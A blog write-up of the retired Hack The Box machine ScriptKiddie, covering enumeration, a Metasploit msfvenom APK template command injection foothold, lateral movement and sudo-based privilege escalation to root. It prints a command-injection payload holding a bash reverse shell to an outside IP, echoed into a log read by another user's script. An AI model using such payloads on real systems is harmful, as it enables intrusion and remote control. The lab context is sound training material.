Hack The Box - ScriptKiddie



All of my Hack The Box adventures are happening in a Kali Linux lab in NAT mode on VMWare Workstation Player. Kali Linux is free and robust, filled with many common hacking tools like nmap, Dirbuster, Gobuster, John the Ripper, Hydra, Nikto, Netcat, and so many moreā€¦

ScriptKiddie

scriptkid.png

ScriptKiddie is a retired machine created by 0xdf. The logo tells us it’s an easy machine running Linux. Machines on HTB quite often have clues hidden in the names and logos…let’s find out.

Enumeration

First, I started with an nmap scan with the switches -T4 -A -p-.

scriptnmap.png

Fascinating. Only two ports open, 22 for SSH and 5000 for Werkzeug. Google tells us that Werkzeug is a collection of libraries that can create a Web Server Gateway Interface for Python applications. Let’s see what happens when the IP is entered into a browser with port 5000

scriptpage.png

It’s got three sections that take input. First, I’ll see how the page functions by hitting the low-hanging fruit.

I entered the IP of the ScriptKiddie box in the nmap section, and got a simple output.

scriptnmap2.png

The Sploits section is a searchsploit portal.

scriptsploit1.png

It doesn’t like it if I use special characters though…no foothold in the searchsploit field.

scriptsploit2.png

The Payload section is using msvenom to create a reverse shell based on user input of OS and local host IP with a default listener port of 4444. It has an upload option for a template. I tried the default dropdown value, input my IP, and got download link that times out after five minutes.

scriptpayload.png

The default dropdown value was for Windows, producing an .exe. Since this is a linux box, an exe won’t wash. I tried the Linux option and it returned an error.

scripterror.png

Foothold

I was able to get the Android dropdown option to produce an apk. I downloaded it and tried feeding it back into the site using 127.0.0.1 as a local IP, to no avail. After some Google-fu, I find a Rapid7 Metasploit Framework msfvenom APK Template Command Injection article. This starts to line up, since the box is using msvenom and creating an APK template. Firing up Metasploit, I use the recommended module and quickly get a msf.apk file…downloaded to my root directory. This means moving it to my lab directory…which I do.

Shell, and User

Next, I fire up my netcat listener and upload msf.apk via the site, being careful to select the Android dropdown and again entering localhost as an IP address. The resulting meterpreter shell provided the user ID (kid), and from there it was easy to upgrade the shell using the classic Python line to get TTY after determining the proper version. In true HTB fashion, the user flag is sitting nicely in the user’s home directory. We also find user “pwn”.

scriptuser.png

Moving Around and Further Enumeration

I initially landed in the /home/kid/html directory. Therein lies app.py, which is the Python script that handles the functions of the main page.

scriptlooking1.png

In the directory for the user pwn, there is a script called scanlosers.sh that runs an nmap scan on something and appends the logs directory in kid’s directory.

scanlosers.png

The logs directory is empty, except for an empty file called “hackers”. Hmmm…I recall getting an error message when inputting non-alphanumerical characters into the Searchsploit window. Reviewing the app.py, there is indeed a regex check that, if failed, does something to /home/kid/logs/hackers as well as render the “stop hacking me” error message.

apppy.png

I tested with more non-alphanumeric input, and the hackers file remained empty. I tested this by echoing text directly into the hackers file, and sure enough it takes input then deletes it.

hackers.png

This is pwn’s script at work, and maybe we can get a shell as pwn by echoing a reverse shell script directly into hackers. The payload will need to be tailored to what’s happening in the scanlosers.sh script. That script reads the log, counts to the third element that’s delimited by spaces

cat $log | cut -d ' ' -f3- 

…after which it sorts the data to isolate the IP. From there, it runs nmap on the IP

while read IP; do
     sh -c "nmap --top-ports 10 -oN recon/${ip}.nmap ${ip} 2>&1 >/dev/null" &

Pwn Shell from Command Injection

So, to tailor the payload, there will need to be two “things” for the script to count in order to get to the third. It will also need to have an arbitrary IP to scan. After that, the reverse shell can be placed in line after a semicolon, and then comment the rest after the shell code so it will work. Get a listener going in another terminal, echo the tailored payload into hackers, and see what happens. I’m using the localhost IP for the arbitrary IP.

kid@scriptkiddie:~/logs$ echo "x x x 127.0.0.1; bash -c 'bash -i >& /dev/tcp/10.10.14.214/1234 0>&1' # ." > hackers

It worked like a charm

pwnuser.png

Privilege Escalation

By checking privileges with sudo -l, msfconsole can be run as root. The root flag is within reach.

scriptroot.png

From here, the Python TTY upgrade can be ran and much havoc can be wreaked on this machine now that the root user has been had.

Review

This was a fun box with lots to do:

  • Nmap found a non-standard port for the webpage
  • Google-Fu
  • Analysis of Python and Bash scripts
  • Lateral movement once a shell was obtained
  • Command Injection
  • Simple privilege escalation once it was discovered a user had root privileges for something.

Happy hacking!

Friday, September 24, 2021 by dobrohaxxor
Add a comment (1573 views)